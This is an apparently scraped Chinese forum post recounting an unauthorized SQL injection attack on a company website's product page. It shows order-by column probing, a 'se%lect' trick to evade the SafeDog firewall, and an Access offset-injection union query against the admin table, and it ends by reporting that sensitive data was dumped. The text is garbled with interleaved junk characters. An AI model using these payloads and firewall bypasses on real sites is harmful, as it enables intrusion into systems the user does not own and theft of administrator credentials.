打开网站,一个企业站。9 q7 p1 W, y& R( ]! L& o
% \- `9 A4 u4 M9 F0 F! b9 O. }: D7 V O# d8 a
顺手加个admin: d4 G& f: j, `" D" B( L
' Y5 s* H: E& t( X/ ]. H+ H: Y$ }
默认后台。
2 I6 i7 ~; G: g& M回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
~$ O4 M; @6 u7 j" L+ q1 y
5 e$ J2 y H- r" ~9 \7 ^" L6 D6 X& R2 V+ @! {9 v
3 A! N# _2 \+ a* F1 K! u
所以就不用御剑扫了,待会直接封IP。
{# @. D# M) K & d& D! g/ ]1 f1 E: s
用order by语句判断是否存在注入。
) \6 u' P: g/ ?4 \http://www.xxx.com /product_show.asp?id=997 order by 1" \: r3 e6 o: M+ o* x, d
http://www.xxx.com /product_show.asp?id=997 order by 100
/ z* j5 }' _- K: g4 K& F- J现在存在注入,经测试后发现是9个字段。
( i& T; o8 k2 b( G3 ]% A% b5 M9 Z3 ^7 n' n
6 ]; T( _0 }# i$ g接下来进行联合查询,猜是否存在admin表。
N6 P7 g8 U+ J. E5 n; z) Jhttp://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。1 n1 g' {' X/ z
; q# j) r7 a3 S- K
6 K) \" _# z a `1 @. t$ T4 I5 ?1 g
在select中间加个%,se%lect绕过安全狗。1 \& M' t; W4 `
+ d* L3 }3 c5 s5 v- U) ~# _
& C, E! k7 v4 z发现存在admin表,然后开始手工猜常用的字段。
- f3 O% Y+ x9 z纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
+ w% `' o: T& G0 C) P ( k8 ^, Q2 E3 O% }" f
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。9 T* E, ~9 a5 ~* N$ b/ f+ j
; Z* H0 @" y- o* ~6 v* F6 p9 D科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。1 ]6 ~' Y- g" s' G. K
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin* [7 S7 [ {2 D
好了,敏感内容出显了。0 d3 q' Y0 \+ `3 Z/ {
& X% F# q) u0 j5 H! q4 x$ p
* h/ g2 X& z1 n
' ~( w7 @5 R. w2 z4 S# o0 x |